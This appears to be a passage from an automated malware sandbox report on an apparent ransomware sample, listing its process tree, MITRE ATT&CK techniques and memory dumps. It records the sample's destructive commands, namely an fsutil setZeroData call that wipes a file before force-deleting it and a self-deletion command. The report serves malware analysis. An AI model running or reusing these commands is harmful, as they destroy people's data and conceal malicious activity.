  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2132
- C:\Windows\system32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:2140
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:2200
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe
  2⤵
  - Deletes itself
  PID:2336
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:2372

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2752

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/344-0-0x000007FEF58B0000-0x000007FEF629C000-memory.dmp

Filesize
9.9MB

Download
memory/344-1-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download